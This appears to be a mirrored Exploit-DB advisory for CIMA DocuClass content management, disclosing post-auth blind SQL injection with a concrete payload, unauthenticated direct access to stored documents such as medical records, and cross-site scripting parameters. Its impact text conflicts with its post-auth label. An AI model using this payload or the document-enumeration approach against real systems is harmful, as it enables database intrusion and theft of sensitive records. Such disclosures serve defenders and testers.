bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/40059.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

62 lines
No EOL
2.1 KiB
Text
Raw Blame History

# Exploit Title: [CIMA DocuClass Enterprise Content Management - Multiple Vulnerabilities]
# Date: [July 15, 2016]
# Exploit Author: [Karn Ganeshen (ipositivesecurity.blogspot.com)]
# Vendor Homepage: [cima-software.com]
# Version: [app version] (All)
# Tested on: [Microsoft Windows 2008 R2]
DocuClass is a modular and scalable enterprise content management (ECM) solution that allows organizations to streamline internal operations by significantly improving the way they manage their information within a business process.
Vulnerability Details
1. SQL Injection [Post Auth]
PoC
Vulnerable URLs & parameters:
A: POST request
/dcrpcserver.php [parameter - uid]
---
Parameter: uid (POST)
Type: boolean-based blind
Title: PostgreSQL boolean-based blind - Parameter replace
Payload: cmd=searchform&action=getsavedqueries&node=&uid=(SELECT (CASE WHEN (7877=7877) THEN 7877 ELSE 1/(SELECT 0) END))
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.5
back-end DBMS: Microsoft SQL Server 2008
Impact
An unauthenticated attacker can read or modify data in the application database, execute code, and compromise the host system.
B: GET request
/e-forms/dcformsserver.exe?action=createimagepdf&documentid=1408648&userid=755 [parameter - userid]
2. Access Control Flaws
DocuClass web application does not enforce strict access control.
PoC:
http://IP/medical_records/0000001337/0000000000123456.pdf
Dump all the documents with a bit of scripting.
Impact
An unauthenticated user can access stored documents by directly calling the document url.
3. Cross-Site Scripting
DocuClass web application lacks strong input validation, and multiple urls & parameters are vulnerable to cross-site scripting (CWE-79) attacks.
/e-forms/dcformsserver.exe [action parameter]
/e-forms/dcformsserver.exe [documentid parameter]
/e-forms/dcformsserver.exe [userid parameter]
/reports_server.php [cmd parameter]
/reports_server.php [reportid parameter]
/reports_server.php [uid parameter]
Impact
An attacker may be able to execute arbitrary scripts/code in the context of the user's browser.
+++++
Reference in a new issue View git blame Copy permalink